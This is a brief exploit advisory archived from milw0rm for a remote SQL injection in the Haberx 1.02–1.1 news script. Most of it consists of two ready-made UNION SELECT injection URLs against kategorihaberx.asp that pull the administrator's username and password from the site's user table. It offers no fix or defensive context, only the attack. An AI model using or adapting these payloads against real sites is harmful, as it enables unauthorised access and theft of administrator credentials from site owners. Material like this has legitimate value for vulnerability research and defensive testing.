Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++ + Haberx v1.1 (tr) SQL Injection Vulnerability + + Author : Fix TR + + Site : www.hack.gen.tr + + Contact : fixtr[at]bsdmail.com + +++++++++++++++++++++++++++++++++++++++++++++++++++ + Download: http://www.aspindir.com/Goster/3983 + Versions: 1.02 between 1.1 + Bug In : kategorix.asp + Risk : High + Admin Nick: http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 + Admin Password: (Big Letters) http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 # milw0rm.com [2006-09-15]